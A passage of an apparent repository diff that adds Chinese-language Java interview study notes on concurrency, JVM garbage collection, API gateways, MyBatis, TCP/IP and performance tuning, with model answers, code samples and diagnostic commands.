- 如何保证高可用(主从、多机房)
```
---
### 6. 阿里 P7 加分项
**技术广度**
- 对多个技术栈有了解(不限于 Java
- 对新技术保持敏感云原生、Service Mesh
- 有跨领域经验(后端、大数据、运维)
**技术深度**
- 精通某一领域(分布式系统、数据库)
- 有开源贡献或技术博客
- 有技术演讲或培训经验
**业务理解**
- 理解业务价值(技术服务业务)
- 有产品思维(从用户角度思考)
- 有商业意识成本、ROI

208
questions/java-concurrent.md Normal file
View File

@@ -0,0 +1,208 @@
# Java 并发编程基础
## 问题
1. 进程和线程的区别?
2. 创建线程有哪些方式?
3. synchronized 关键字的原理?
4. volatile 关键字的作用?
5. CASCompare And Swap的原理和 ABA 问题?
6. ThreadLocal 的原理和内存泄漏问题?
---
## 标准答案
### 1. 进程 vs 线程
| 特性 | 进程 | 线程 |
|------|------|------|
| **资源** | 独立内存、文件描述符 | 共享进程资源 |
| **通信** | IPC管道、消息队列、共享内存 | 共享内存 |
| **上下文切换** | 慢(需保存更多状态) | 快 |
| **开销** | 大 | 小 |
---
### 2. 创建线程的方式
**方式 1继承 Thread**
```java
class MyThread extends Thread {
@Override
public void run() {
System.out.println("Thread running");
}
}
new MyThread().start();
```
**方式 2实现 Runnable**
```java
class MyRunnable implements Runnable {
@Override
public void run() {
System.out.println("Runnable running");
}
}
new Thread(new MyRunnable()).start();
```
**方式 3实现 Callable有返回值**
```java
class MyCallable implements Callable<String> {
@Override
public String call() throws Exception {
return "Callable result";
}
}
FutureTask<String> future = new FutureTask<>(new MyCallable());
new Thread(future).start();
String result = future.get();
```
---
### 3. synchronized 原理
**字节码层面**
```java
// 同步方法
public synchronized void method() { }
// 字节码ACC_SYNCHRONIZED
// 同步代码块
synchronized (object) { }
// 字节码monitorenter、monitorexit
```
**对象头**
```
Mark Word32 位 JVM
┌────────────┬────────────┬──────────────┐
│ 锁状态 │ 29 位或2位 │ 是否是偏向锁 │
├────────────┼────────────┼──────────────┤
│ 无锁 │ 对象 Hash │ 01 │
│ 偏向锁 │ 线程 ID │ 01 │
│ 轻量级锁 │ 栈中 Lock Record | 00 │
│ 重量级锁 │ 管程指针 │ 10 │
└────────────┴────────────┴──────────────┘
```
**锁升级**
```
无锁 → 偏向锁 → 轻量级锁CAS 自旋) → 重量级锁(阻塞)
```
---
### 4. volatile 关键字
**作用**
1. **保证可见性**JMM主内存与工作内存
2. **禁止指令重排序**
**示例**
```java
private volatile boolean running = true;
public void stop() {
running = false; // 立即对所有线程可见
}
```
**不能保证原子性**
```java
private volatile int count = 0;
// ❌ 非线程安全
count++; // read → modify → write非原子操作
// ✅ 线程安全
synchronized (this) {
count++;
}
```
---
### 5. CAS 和 ABA 问题
**CASCompare And Swap**
```java
// Unsafe.compareAndSwapInt(object, offset, expect, update)
// 如果当前值 == 期望值,则更新为 update
AtomicInteger atomic = new AtomicInteger(0);
atomic.compareAndSet(0, 1); // CAS 操作
```
**ABA 问题**
```
线程 A读取值 A
线程 BA → B → A
线程 ACAS 成功(不知道值已变化)
```
**解决版本号AtomicStampedReference**
```java
AtomicStampedReference<Integer> ref = new AtomicStampedReference<>(100, 0);
int oldStamp = ref.getStamp();
ref.compareAndSet(100, 101, oldStamp, oldStamp + 1); // 版本号也参与 CAS
```
---
### 6. ThreadLocal
**原理**
```java
public void set(T value) {
Thread t = Thread.currentThread();
ThreadLocalMap map = t.threadLocals;
if (map != null)
map.set(this, value); // key 是 ThreadLocal 对象value 是值
else
createMap(t, value);
}
```
**内存泄漏**
```java
// ❌ 可能导致内存泄漏
private static ThreadLocal<byte[]> data = new ThreadLocal<>();
public void process() {
data.set(new byte[1024 * 1024]); // 1MB
// 未调用 remove()
}
```
**原因**
- ThreadLocal 是弱引用,但 value 是强引用
- 线程不销毁value 不会回收
**解决**
```java
try {
data.set(new byte[1024 * 1024]);
// 业务逻辑
} finally {
data.remove(); // 必须
}
```
---
### 7. 阿里 P7 加分项
**深度理解**
- 理解 JMMJava 内存模型)
- 理解 happens-before 原则
- 理解 synchronized 的优化(偏向锁、轻量级锁)
**实战经验**
- 有并发问题的排查经验
- 有性能优化经验(减少锁竞争)
- 有死锁的排查和解决经验

0
questions/java-memory.md Normal file
View File

324
questions/jvm-gc.md Normal file
View File

@@ -0,0 +1,324 @@
# JVM 和垃圾回收
## 问题
1. JVM 内存模型是怎样的?
2. 垃圾回收有哪些算法G1 和 CMS 的区别?
3. 什么是 Stop-The-World如何减少 STW 时间?
4. 常见的 OOM 及解决方案?
5. JVM 参数如何调优?
6. 如何分析 GC 日志?
---
## 标准答案
### 1. JVM 内存模型
#### **运行时数据区**
```
┌─────────────────────────────────────┐
│ 方法区Method Area
│ (类信息、常量、静态变量、JIT 代码) │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ 堆Heap
│ (对象实例、数组) │
│ ┌──────────┐ ┌──────────┐ │
│ │ 新生代 │ │ 老年代 │ │
│ │ Eden │ │ │ │
│ │ S0 │ │ │ │
│ │ S1 │ │ │ │
│ └──────────┘ └──────────┘ │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ JVM 栈Java Stack
│ (栈帧:局部变量、操作数栈、返回地址) │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ 本地方法栈Native Stack
│ (Native 方法调用) │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ 程序计数器PC Register
│ (当前执行的字节码指令) │
└─────────────────────────────────────┘
```
---
### 2. 垃圾回收算法
#### **标记-清除Mark-Sweep**
**步骤**
1. 标记存活对象
2. 清除未标记对象
**问题**
- 产生内存碎片
- 标记和清除效率都不高
---
#### **复制Copying**
**步骤**
1. 将存活对象复制到另一块内存
2. 清空当前内存
**优点**
- 无内存碎片
- 简单高效
**缺点**
- 内存利用率低(浪费一半)
**适用**新生代Eden + S0 + S1
---
#### **标记-整理Mark-Compact**
**步骤**
1. 标记存活对象
2. 将存活对象向一端移动
3. 清理边界外的内存
**优点**
- 无内存碎片
**缺点**
- 移动对象成本高
**适用**:老年代
---
#### **分代收集Generational**
**原理**
- **弱分代假说**:大多数对象朝生夕灭
- **新生代**复制算法Eden : S0 : S1 = 8 : 1 : 1
- **老年代**:标记-整理或标记-清除
---
### 3. 垃圾收集器
#### **Serial 收集器**
**特点**单线程STW
**适用**:客户端应用、小内存
```bash
-XX:+UseSerialGC
```
---
#### **Parallel 收集器**
**特点**多线程STW
**适用**:后台任务、批处理
```bash
-XX:+UseParallelGC
```
---
#### **CMSConcurrent Mark Sweep**
**特点**:并发收集,低停顿
**步骤**
1. 初始标记STW
2. 并发标记
3. 重新标记STW
4. 并发清除
**问题**
- CPU 敏感
- 浮动垃圾
- 内存碎片
```bash
-XX:+UseConcMarkSweepGC
```
---
#### **G1Garbage First**
**特点**
- **可预测停顿**:用户指定停顿时间
- **分区回收**:将堆划分为多个 Region
- **优先回收垃圾多的 Region**
**适用**:大堆内存(> 6GB、多核 CPU
```bash
-XX:+UseG1GC
-XX:MaxGCPauseMillis=200 # 目标停顿时间
```
---
#### **ZGCZ Garbage Collector**
**特点**
- 并发整理(无内存碎片)
- 停顿时间 < 10ms
- 支持 TB 级堆内存
**适用**:超大内存、低延迟要求
```bash
-XX:+UseZGC
```
---
### 4. OOM 及解决方案
#### **Java.lang.OutOfMemoryError: Java heap space**
**原因**:堆内存不足
**解决**
```bash
# 增加堆内存
-Xms4g -Xmx4g
# 使用 G1 收集器
-XX:+UseG1GC
```
---
#### **Java.lang.OutOfMemoryError: Metaspace**
**原因**:方法区(元空间)不足
**解决**
```bash
# 增加元空间大小
-XX:MetaspaceSize=256m
-XX:MaxMetaspaceSize=512m
```
---
#### **Java.lang.OutOfMemoryError: GC overhead limit exceeded**
**原因**GC 频繁,但回收内存少
**解决**
- 增加堆内存
- 优化代码(减少对象创建)
---
#### **Java.lang.StackOverflowError**
**原因**:栈深度过大(递归太深)
**解决**
```bash
# 增加栈大小
-Xss2m
```
---
### 5. JVM 参数调优
#### **常用参数**
```bash
# 堆内存
-Xms4g # 初始堆大小
-Xmx4g # 最大堆大小
-Xmn2g # 新生代大小
-XX:MetaspaceSize=256m
-XX:MaxMetaspaceSize=512m
# GC 选择
-XX:+UseG1GC
-XX:MaxGCPauseMillis=200
# GC 日志
-Xlog:gc*:file=/tmp/gc.log:time,tags:filecount=5,filesize=10m
# OOM 时自动 Dump
-XX:+HeapDumpOnOutOfMemoryError
-XX:HeapDumpPath=/tmp/
```
---
#### **调优步骤**
```
1. 监控 GC 频率和停顿时间
2. 分析 GC 日志
3. 调整堆内存和新生代比例
4. 选择合适的 GC 收集器
5. 优化代码(减少对象创建)
6. 压测验证
```
---
### 6. GC 日志分析
#### **工具**
- **GCViewer**:可视化分析
- **GCeasy**在线分析https://gceasy.io
- **阿里 Arthas**:线上诊断
---
#### **GC 日志示例**
```
[GC (Allocation Failure) [PSYoungGen: 2048K->512K(2560K)] 2048K->1024K(9216K), 0.0023456 secs]
[Full GC (Ergonomics) [PSYoungGen: 512K->0K(2560K)] [ParOldGen: 512K->512K(6656K)] 1024K->512K(9216K), [Metaspace: 5120K->5120K(1056768K)], 0.0234567 secs]
```
**解读**
- **GC**Minor GC
- **Full GC**Major GC
- **Allocation Failure**:新生代不足
- **Ergonomics**:自适应调整
- **2048K->512K(2560K)**:回收前 2048K回收后 512K总容量 2560K
- **0.0023456 secs**:停顿时间
---
### 7. 阿里 P7 加分项
**深度理解**
- 理解 G1 的 Mixed GC 和 Region 设计
- 理解 ZGC 的染色指针和读屏障
- 理解 JVM 的 JIT 编译和逃逸分析
**实战经验**
- 有处理线上 OOM 问题的经验
- 有 GC 参数调优的经验
- 有 GC 日志分析和优化经验
**架构能力**
- 能设计高吞吐量或低延迟的 JVM 方案
- 能设计 JVM 监控和告警体系
- 能制定 JVM 调优规范
**技术选型**
- 了解各种 GC 收集器的适用场景
- 了解 JDK 8/11/17/21 的 GC 改进
- 有 GraalVM 等新技术的使用经验

0
questions/linux-commands.md Normal file
View File

1909
questions/lock-mechanism.md Normal file
View File

File diff suppressed because it is too large Load Diff

171
questions/microservices-gateway.md Normal file
View File

@@ -0,0 +1,171 @@
# API 网关核心原理
## 问题
1. 什么是 API 网关?为什么需要 API 网关?
2. API 网关的核心功能有哪些?
3. Spring Cloud Gateway 和 Zuul 的区别?
4. 网关的限流、熔断、降级如何实现?
5. 网关的路由和负载均衡策略?
---
## 标准答案
### 1. API 网关的作用
**核心功能**
1. **路由转发**:将请求转发到后端服务
2. **统一鉴权**:集中的认证和授权
3. **限流熔断**:保护后端服务
4. **日志监控**:统一的日志和监控
5. **协议转换**HTTP → WebSocket、gRPC 等
6. **灰度发布**:按规则路由流量
---
### 2. Spring Cloud Gateway 核心概念
**三大组件**
```
Route路由
Predicate断言
Filter过滤器
```
**示例**
```yaml
spring:
cloud:
gateway:
routes:
- id: user-service
uri: lb://user-service
predicates:
- Path=/api/users/**
- Header=Authorization, .*
filters:
- StripPrefix=1
- RequestRateLimiter=10 # 限流10 QPS
```
---
### 3. Gateway vs Zuul
| 特性 | Zuul 1.x | Zuul 2.x | Spring Cloud Gateway |
|------|----------|----------|---------------------|
| **模型** | Servlet 阻塞 | Netty 非阻塞 | Netty 非阻塞 |
| **性能** | 低 | 中 | 高 |
| **Spring** | 集成好 | 集成一般 | 原生支持 |
| **动态路由** | 不支持 | 支持 | 支持 |
| **限流** | 需自研 | 需自研 | 内置Redis |
---
### 4. 核心功能实现
#### **限流**
```yaml
spring:
cloud:
gateway:
routes:
- id: rate-limiter
uri: lb://user-service
predicates:
- Path=/api/users/**
filters:
- name: RequestRateLimiter
args:
redis-rate-limiter.replenishRate: 10 # 每秒填充 10 个令牌
redis-rate-limiter.burstCapacity: 20 # 桶容量 20
```
---
#### **熔断Circuit Breaker**
```yaml
spring:
cloud:
gateway:
routes:
- id: circuit-breaker
uri: lb://user-service
predicates:
- Path=/api/users/**
filters:
- name: CircuitBreaker
args:
fallbackUri: forward:/fallback
```
---
#### **统一鉴权**
```java
@Component
public class AuthFilter implements GlobalFilter {
@Override
public Mono<Void> filter(ServerWebExchange exchange, GatewayFilterChain chain) {
String token = exchange.getRequest().getHeaders().getFirst("Authorization");
if (token == null || !validateToken(token)) {
exchange.getResponse().setStatusCode(HttpStatus.UNAUTHORIZED);
return exchange.getResponse().setComplete();
}
return chain.filter(exchange);
}
}
```
---
### 5. 网关高可用
**部署架构**
```
┌─────────────┐
│ 负载均衡 │
│ (Nginx) │
└──────┬──────┘
┌───────────────┼───────────────┐
│ │ │
┌────▼────┐ ┌────▼────┐ ┌────▼────┐
│Gateway 1│ │Gateway 2│ │Gateway 3│
└────┬────┘ └────┬────┘ └────┬────┘
│ │ │
└──────────────┼──────────────┘
┌──────────────┼──────────────┐
│ │ │
┌────▼────┐ ┌────▼────┐ ┌────▼────┐
│Service A│ │Service B│ │Service C│
└─────────┘ └─────────┘ └─────────┘
```
---
### 6. 阿里 P7 加分项
**深度理解**
- 理解 WebFlux 的响应式编程模型
- 理解 Netty 的事件循环
- 理解限流算法(令牌桶、漏桶)
**实战经验**
- 有网关性能调优的经验
- 有网关灰度发布的经验
- 有网关监控和故障排查的经验
**架构能力**
- 能设计高可用网关架构
- 能设计网关的监控体系
- 能设计网关的动态路由方案

177
questions/mybatis.md Normal file
View File

@@ -0,0 +1,177 @@
# MyBatis 核心原理
## 问题
1. MyBatis 的核心组件有哪些?
2. MyBatis 的缓存机制(一级缓存、二级缓存)?
3. MyBatis 的插件原理是什么?
4. #{} 和 ${} 的区别是什么?
5. MyBatis 如何处理批量操作?
6. MyBatis 的动态 SQL 是如何实现的?
---
## 标准答案
### 1. MyBatis 核心组件
```
Configuration全局配置
SqlSession会话
Executor执行器
StatementHandler语句处理器
ParameterHandler参数处理器
ResultSetHandler结果集处理器
```
---
### 2. 缓存机制
**一级缓存SqlSession 级别)**
```java
SqlSession session = sqlSessionFactory.openSession();
User user1 = session.selectOne("selectUser", 1);
User user2 = session.selectOne("selectUser", 1); // 从缓存获取
```
**二级缓存Mapper 级别)**
```xml
<!-- 开启二级缓存 -->
<cache/>
```
```java
User user1 = session1.selectOne("selectUser", 1);
session1.close(); // 一级缓存清空,写入二级缓存
User user2 = session2.selectOne("selectUser", 1); // 从二级缓存获取
```
---
### 3. 插件原理
**拦截的四大组件**
- Executor
- StatementHandler
- ParameterHandler
- ResultSetHandler
**示例**
```java
@Intercepts({
@Signature(type = Executor.class, method = "update", args = {MappedStatement.class, Object.class})
})
public class SqlInterceptor implements Interceptor {
@Override
public Object intercept(Invocation invocation) throws Throwable {
// 前置逻辑
Object result = invocation.proceed();
// 后置逻辑
return result;
}
}
```
---
### 4. #{} vs ${}
| 特性 | #{} | ${} |
|------|-----|-----|
| **预处理** | 是PreparedStatement | 否Statement |
| **SQL 注入** | 安全 | 不安全 |
| **类型转换** | 自动 | 需手动 |
| **动态表名/列名** | 不支持 | 支持 |
**示例**
```xml
<!-- ✅ 安全 -->
SELECT * FROM users WHERE id = #{id}
<!-- ❌ SQL 注入风险 -->
SELECT * FROM users WHERE id = ${id}
<!-- ✅ 动态表名(只能用 ${}-->
SELECT * FROM ${tableName} WHERE id = #{id}
```
---
### 5. 批量操作
**方式 1SqlSession 批量**
```java
SqlSession session = sqlSessionFactory.openSession(ExecutorType.BATCH);
try {
UserMapper mapper = session.getMapper(UserMapper.class);
for (User user : users) {
mapper.insert(user);
}
session.commit();
} finally {
session.close();
}
```
**方式 2Batch Insert**
```xml
<insert id="batchInsert">
INSERT INTO users (name, email) VALUES
<foreach collection="users" item="user" separator=",">
(#{user.name}, #{user.email})
</foreach>
</insert>
```
---
### 6. 动态 SQL
**常用标签**
```xml
<select id="findUsers" resultType="User">
SELECT * FROM users
<where>
<if test="name != null">
AND name = #{name}
</if>
<if test="email != null">
AND email = #{email}
</if>
</where>
</select>
<select id="findUsersByIds" resultType="User">
SELECT * FROM users
WHERE id IN
<foreach collection="ids" item="id" open="(" separator="," close=")">
#{id}
</foreach>
</select>
```
---
### 7. 阿里 P7 加分项
**深度理解**
- 理解 MyBatis 的代理机制MapperProxy
- 理解二级缓存的并发问题
- 理解插件的责任链模式
**实战经验**
- 有处理 MyBatis 性能问题的经验
- 有自定义插件的经验
- 有 MyBatis 与 Spring 集成的经验
**架构能力**
- 能设计多数据源方案
- 能设计分库分表的 MyBatis 方案
- 能设计 MyBatis 监控体系

0
questions/nacos.md Normal file
View File

577
questions/network-tcpip.md Normal file
View File

@@ -0,0 +1,577 @@
# TCP/IP 网络协议
## 问题
1. TCP 和 UDP 的区别是什么?
2. TCP 三次握手和四次挥手的流程是什么?为什么需要三次握手?
3. TCP 如何保证可靠传输?
4. 什么是 SYN 洪水攻击?如何防范?
5. HTTP 和 HTTPS 的区别是什么?
6. HTTP 1.1、2.0、3.0 的演进历程和主要特性
7. 什么是粘包和拆包?如何解决?
8. 在实际项目中遇到过哪些网络问题?
---
## 标准答案
### 1. TCP vs UDP
#### **对比表**
| 特性 | TCP | UDP |
|------|-----|-----|
| **连接性** | 面向连接 | 无连接 |
| **可靠性** | 可靠传输 | 不可靠 |
| **顺序** | 保证顺序 | 不保证顺序 |
| **速度** | 较慢 | 快 |
| **流量控制** | 有(滑动窗口) | 无 |
| **拥塞控制** | 有 | 无 |
| **首部开销** | 20-60 字节 | 8 字节 |
| **应用场景** | 文件传输、邮件、HTTP | 视频流、直播、DNS |
---
#### **TCP 特性**
**面向连接**
```
客户端 服务器
│ │
│─────── SYN ───────────────→│ 建立连接
│←────── SYN+ACK ────────────│
│─────── ACK ───────────────→│
│ │
│─────── 数据 ───────────────→│
│←─────── ACK ───────────────│
│ │
│─────── FIN ───────────────→│ 断开连接
│←─────── ACK ───────────────│
│←────── FIN ────────────────│
│─────── ACK ───────────────→│
```
**可靠传输**
- 确认应答ACK
- 超时重传
- 校验和
- 序列号
**流量控制**
- 滑动窗口协议
- 动态调整窗口大小
---
#### **UDP 特性**
**无连接、不可靠**
```
客户端 服务器
│ │
│─────── 数据报 ─────────────→│ (可能丢失)
│─────── 数据报 ─────────────→│ (可能乱序)
│ │
│ │
```
**优点**
- 速度快(无连接、无确认)
- 开销小(首部 8 字节)
- 支持一对一、一对多、多对多
**应用场景**
- 视频直播(可容忍丢帧)
- 在线游戏(实时性要求高)
- DNS 查询(请求响应快)
- VoIP语音通话
---
### 2. TCP 三次握手和四次挥手
#### **三次握手**
**流程**
```
客户端 服务器
│ │
│─────── SYN=1, seq=x ──────→│ SYN_SENT
│ │
│←───── SYN=1, ACK=1, seq=y, ack=x+1 ───│
│ SYN_RCVD │
│ │
│─────── ACK=1, seq=x+1, ack=y+1 ────→│ ESTABLISHED
│ ESTABLISHED │
```
**状态变化**
```
客户端CLOSED → SYN_SENT → ESTABLISHED
服务器CLOSED → LISTEN → SYN_RCVD → ESTABLISHED
```
---
#### **为什么需要三次握手?**
**目的**
1. **确认双方收发能力**
- 第一次握手:服务端确认客户端能发
- 第二次握手:客户端确认服务端能收能发
- 第三次握手:服务端确认客户端能收
2. **防止已失效的连接请求突然又传送到服务端**
```
场景:客户端发送的第一个连接请求在网络中滞留
结果:客户端超时重发,建立连接后,滞留的请求到达
如果只有两次握手:
─ 客户端发送 SYN
─ 服务器收到,建立连接,等待数据
─ 滞留的 SYN 到达,服务器又建立连接(错误!)
三次握手避免:
─ 服务器收到滞留的 SYN回复 SYN+ACK
─ 客户端发现 ack 不对,丢弃(不建立连接)
```
3. **同步初始序列号ISN**
- 双方协商好初始序列号
- 保证数据的顺序和去重
---
#### **四次挥手**
**流程**
```
客户端 服务器
│ │
│─────── FIN=1, seq=u ──────→│ FIN_WAIT1
│ │ CLOSE_WAIT
│←─────── ACK=1, seq=v, ack=u+1 ───│
│ FIN_WAIT2 │
│ │
│←─────── FIN=1, ACK=1, seq=w, ack=u+1 ───│
│ TIME_WAIT │ LAST_ACK
│ │
│─────── ACK=1, seq=u+1, ack=w+1 ────→│ CLOSED
│ (等待 2MSL) │
```
**状态变化**
```
客户端ESTABLISHED → FIN_WAIT1 → FIN_WAIT2 → TIME_WAIT → CLOSED
服务器ESTABLISHED → CLOSE_WAIT → LAST_ACK → CLOSED
```
---
#### **为什么需要四次挥手?**
**原因**
- TCP 是**全双工**协议(双向传输)
- 双方都需要关闭发送方向
**流程**
1. 客户端发送 FIN关闭客户端→服务器方向
2. 服务器确认 ACK但服务器可能还有数据要发送
3. 服务器发送 FIN关闭服务器→客户端方向
4. 客户端确认 ACK
---
#### **为什么 TIME_WAIT 状态需要等待 2MSL**
**MSLMaximum Segment Lifetime**
- 报文最大生存时间(通常 30 秒 - 2 分钟)
- 2MSL = 1 分钟 - 4 分钟
**目的**
1. **确保最后一个 ACK 能到达**
- 如果 ACK 丢失,服务器会重传 FIN
- 客户端等待 2MSL可以重传 ACK
2. **让旧连接的报文自然消失**
- 防止旧连接的报文干扰新连接
- 确保网络中所有旧报文都已消失
**问题**
- 大量 TIME_WAIT 会导致端口资源耗尽
- 解决:调低 `TIME_WAIT` 时间或端口复用
```bash
# Linux 调整
net.ipv4.tcp_tw_reuse = 1 # 端口复用
net.ipv4.tcp_tw_recycle = 0 # 关闭快速回收(有坑)
```
---
### 3. TCP 可靠传输机制
#### **核心机制**
1. **序列号Sequence Number**
- 每个字节都有编号
- 用于排序和去重
2. **确认应答ACK**
- 接收方确认收到的数据
- ACK = 下一个期望接收的字节序号
```
发送方seq=1000, len=100
接收方ack=1100期待下一个字节
```
3. **超时重传RTO**
- 发送方启动定时器
- 超时未收到 ACK重传数据
4. **快速重传**
- 收到 3 个重复 ACK立即重传
- 无需等待超时
```
发送方seq=1000, len=100
接收方:期望 1100但收到 1200乱序
接收方:连续发送 ack=11003 次)
发送方:收到 3 个重复 ack快速重传
```
5. **滑动窗口**
- 流量控制
- 动态调整发送速率
6. **拥塞控制**
- 慢启动、拥塞避免、快重传、快恢复
---
### 4. SYN 洪水攻击
#### **攻击原理**
**场景**:攻击者发送大量 SYN 包,但不完成三次握手。
```
攻击者 服务器
│ │
├─── SYN ─────────────────────→│ 分配资源
├─── SYN ─────────────────────→│ 分配资源
├─── SYN ─────────────────────→│ 分配资源
├─── SYN ─────────────────────→│ 分配资源
│ (不回复 ACK) │ 资源耗尽
│ │ 无法服务正常用户
```
**后果**
- 服务器维护大量 `SYN_RCVD` 连接
- 内存资源耗尽
- 无法响应正常用户的连接请求
---
#### **防范措施**
**1. SYN Cookies**
```bash
# 开启 SYN Cookies
net.ipv4.tcp_syncookies = 1
```
**原理**
- 不分配资源
- 计算 Cookie 并编码在 SYN+ACK 的初始序列号中
- 客户端回复 ACK 时验证 Cookie
**2. 增加 SYN 队列**
```bash
net.ipv4.tcp_max_syn_backlog = 8192
```
**3. 缩短超时时间**
```bash
net.ipv4.tcp_synack_retries = 2
```
**4. 防火墙**
- 限制单个 IP 的连接数
- 检测异常流量并拦截
---
### 5. HTTP vs HTTPS
#### **对比**
| 特性 | HTTP | HTTPS |
|------|------|-------|
| **协议** | 应用层 | 应用层 + 安全层SSL/TLS |
| **端口** | 80 | 443 |
| **加密** | 明文传输 | 加密传输 |
| **证书** | 不需要 | 需要 CA 证书 |
| **性能** | 快 | 较慢TLS 握手) |
| **SEO** | 无优惠 | 搜索引擎优先排名 |
---
#### **HTTPS 工作流程**
```
客户端 服务器
│ │
│─────── ClientHello ────────────→│ (支持的加密套件)
│ │
│←────── ServerHello ─────────────│ (选择的加密套件 + 证书)
│←────── Certificate ─────────────│
│ │
│─────── ClientKeyExchange ─────→│ (生成随机数)
│─────── ChangeCipherSpec ───────→│ (之后消息加密)
│─────── Finished ───────────────→│
│ │
│←────── ChangeCipherSpec ────────│
│←────── Finished ────────────────│
│ │
│══════ 加密通信 ══════════════════│
```
---
#### **HTTPS 的安全性**
1. **数据加密**:防止中间人窃听
2. **数据完整性**:防止数据被篡改
3. **身份认证**:防止钓鱼网站
---
### 6. HTTP 版本演进
#### **HTTP/1.0**
**特点**
- 每个请求都需要新的 TCP 连接
- 无状态、无连接
**问题**
- 性能差(频繁建立连接)
- 队头阻塞
---
#### **HTTP/1.1**
**改进**
1. **持久连接**`Connection: keep-alive`
2. **管道化Pipelining**:可发送多个请求
3. **分块传输**`Transfer-Encoding: chunked`
4. **缓存**:更强的缓存控制
**问题**
- 队头阻塞仍然存在
- 请求串行执行
---
#### **HTTP/2.0**
**改进**
1. **二进制协议**:不再是纯文本
2. **多路复用**:一个 TCP 连接并发多个请求
3. **头部压缩**HPACK 算法
4. **服务端推送**Server Push
**多路复用**
```
HTTP/1.1
请求1 → ━━━ 连接1 ━━━ → 响应1
请求2 → ━━━ 连接2 ━━━ → 响应2
请求3 → ━━━ 连接3 ━━━ → 响应3
HTTP/2.0
请求1 ┓
请求2 ┣━━━━ 单连接 ━━━→ ┳ 响应1
请求3 ┛ ┻ 响应2
响应3
```
---
#### **HTTP/3.0QUIC**
**改进**
1. **基于 UDP**:不再是 TCP
2. **解决队头阻塞**:流级别隔离
3. **更快握手**0-RTT
4. **连接迁移**IP 变化不影响连接
**架构**
```
HTTP/3.0
QUICUDP
加密、可靠传输、流控制
```
---
### 7. 粘包和拆包
#### **问题**
**TCP 是字节流协议**,无消息边界:
```
发送方发送两个包:
┌──────┐ ┌──────┐
│ 包1 │ │ 包2 │
└──────┘ └──────┘
接收方可能收到:
1. 正常:┌──────┐┌──────┐
2. 粘包:┌──────┐┌──────┐(两个包粘在一起)
3. 拆包:┌────┐ ┌──┐┌──┐┌────┐(包被拆散)
```
---
#### **解决方案**
**1. 固定长度**
```
每个包固定 100 字节
优点:简单
缺点:浪费空间(短消息)
```
**2. 分隔符**
```
每个包以 \n 结束
优点:实现简单
缺点:内容中不能有分隔符
```
**3. 长度字段(推荐)**
```
┌────┬──────────┐
│长度│ 数据 │
└────┴──────────┘
实现Netty 的 LengthFieldBasedFrameDecoder
```
**Netty 示例**
```java
// 服务端
public class Server {
public static void main(String[] args) {
EventLoopGroup bossGroup = new NioEventLoopGroup();
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap bootstrap = new ServerBootstrap();
bootstrap.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.childHandler(new ChannelInitializer<SocketChannel>() {
@Override
protected void initChannel(SocketChannel ch) {
// 解决粘包拆包:长度字段解码器
ch.pipeline().addLast(new LengthFieldBasedFrameDecoder(
1024 * 1024, // 最大帧长度
4, // 长度字段偏移量
4, // 长度字段长度
0, // 长度调整值
4 // 剥离的字节数
));
ch.pipeline().addLast(new MessageHandler());
}
});
bootstrap.bind(8080).sync().channel().closeFuture().sync();
} finally {
bossGroup.shutdownGracefully();
workerGroup.shutdownGracefully();
}
}
}
// 消息编解码
public class MessageEncoder extends MessageToByteEncoder<Message> {
@Override
protected void encode(ChannelHandlerContext ctx, Message msg, ByteBuf out) {
byte[] data = msg.getBody().getBytes();
out.writeInt(data.length); // 长度字段
out.writeBytes(data); // 数据字段
}
}
```
---
### 8. 实际项目经验
#### **案例 1TCP 长连接异常断开**
**问题**
- 客户端崩溃,服务器未收到 FIN
- 服务器维护大量死连接
**解决**
```java
// 启用 TCP Keep-Alive
socket.setKeepAlive(true);
// 应用层心跳
@Scheduled(fixedRate = 30000)
public void sendHeartbeat() {
channel.writeAndFlush(new HeartbeatMessage());
}
// 超时断开
ch.pipeline().addLast(new IdleStateHandler(60, 0, 0, TimeUnit.SECONDS));
ch.pipeline().addLast(new HeartbeatHandler());
```
---
#### **案例 2HTTPS 性能优化**
**问题**
- HTTPS 握手耗时 200ms+
- 高并发下性能差
**解决**
1. **HTTP/2 多路复用**
2. **TLS False Start**:减少 1 个 RTT
3. **Session Resumption**:恢复会话
4. **HSTS**:强制 HTTPS避免重定向
---
### 9. 阿里 P7 加分项
**深度理解**
- 理解 TCP 的拥塞控制算法( Reno、Cubic、BBR
- 理解 QUIC 协议的设计原理
- 理解 TLS 1.3 的改进0-RTT、加密握手
**实战经验**
- 有处理网络抖动导致的连接不稳定问题
- 有 TCP 参数调优经验
- 有 HTTPS 性能优化经验
**架构能力**
- 能设计高性能的网络通信框架
- 能设计跨地域的网络架构
- 有网络监控和故障排查经验
**技术选型**
- 了解 gRPC、Thrift 等 RPC 框架
- 了解 Netty、Mina 等网络框架
- 能根据业务特点选择合适的协议

0
questions/nginx.md Normal file
View File

603
questions/performance-tuning.md Normal file
View File

@@ -0,0 +1,603 @@
# 性能优化
## 问题
1. 性能优化的常见思路和方法有哪些?
2. 如何进行系统性能瓶颈分析?
3. 数据库性能优化有哪些方法?
4. JVM 性能调优的常见问题和解决方案?
5. 接口性能优化有哪些技巧?
6. 如何进行全链路压测?
7. 在实际项目中如何进行性能优化?
---
## 标准答案
### 1. 性能优化思路
#### **优化原则**
1. **测量优先**:先测量,后优化
2. **抓大放小**:优化瓶颈,而非所有地方
3. **数据驱动**:用数据说话
4. **权衡取舍**:优化往往带来复杂性
---
#### **优化层次**
```
用户响应时间
前端优化减少请求、CDN、缓存
网络优化(减少 RTT、压缩
后端优化(代码、算法、并发)
数据库优化(索引、分库分表)
操作系统优化TCP、内核参数
硬件优化CPU、内存、磁盘、网络
```
---
### 2. 性能瓶颈分析
#### **分析工具**
**1. CPU 分析**
```bash
# top 命令
top -p <pid>
# 查看 CPU 使用率
%CPU: 80.5
# 查看线程 CPU
top -H -p <pid>
```
**2. 内存分析**
```bash
# 查看内存使用
free -h
# 查看进程内存
ps aux | grep java
# JVM 堆内存
jmap -heap <pid>
```
**3. 磁盘 I/O**
```bash
# iostat
iostat -x 1
# 查看 I/O 等待
%iowait: 15.2 # 高说明磁盘瓶颈
```
**4. 网络 I/O**
```bash
# 查看网络连接
netstat -anp | grep <pid>
# 查看网络流量
iftop
```
---
#### **Java 性能分析工具**
**1. JProfiler**
- CPU Profiler
